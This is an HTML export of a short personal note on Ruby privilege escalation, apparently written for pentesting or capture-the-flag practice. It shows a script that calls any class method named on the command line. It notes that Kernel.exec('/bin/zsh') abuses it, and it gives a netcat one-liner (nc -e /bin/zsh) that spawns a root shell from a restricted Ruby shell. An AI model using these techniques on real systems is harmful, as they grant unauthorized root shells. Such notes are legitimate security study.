<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>ruby</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>ruby</h1>

      <div class="ck-content">
        <p><a href="https://www.ruby-lang.org">https://www.ruby-lang.org</a>   <a href="https://rubyfu.net/">https://rubyfu.net/</a> </p>
        <figure
        class="table">
          <table>
            <tbody>
              <tr>
                <td>
                  <p>1
                    <br />2
                    <br />3
                    <br />4
                    <br />5
                    <br />6
                    <br />7
                    <br />8
                    <br />9</p>
                  <p>10
                    <br /> </p>
                </td>
                <td><pre><code class="language-text-plain">#!/usr/bin/ruby

require 'rails'

if ARGV.size == 3
    klass = ARGV[0].constantize
    obj = klass.send(ARGV[1].to_sym, ARGV[2])
else
    puts File.read(__FILE__)
end</code></pre>

                </td>
              </tr>
            </tbody>
          </table>
          </figure>
          <ul>
            <li>Class: <code>Kernel</code>

            </li>
            <li>class method: <code>exec()</code>

            </li>
            <li>argument: <code>/bin/zsh</code>

            </li>
          </ul>
          <p>use <code>irb</code>  to get a ruby command prompt,</p>
          <p>for a restricted(special characters blocked) ruby shell, running as root
            use </p><pre><code class="language-text-x-ruby"> %x{nc -e /bin/zsh localhost 9999}</code></pre>
      </div>
    </div>
  </body>

</html>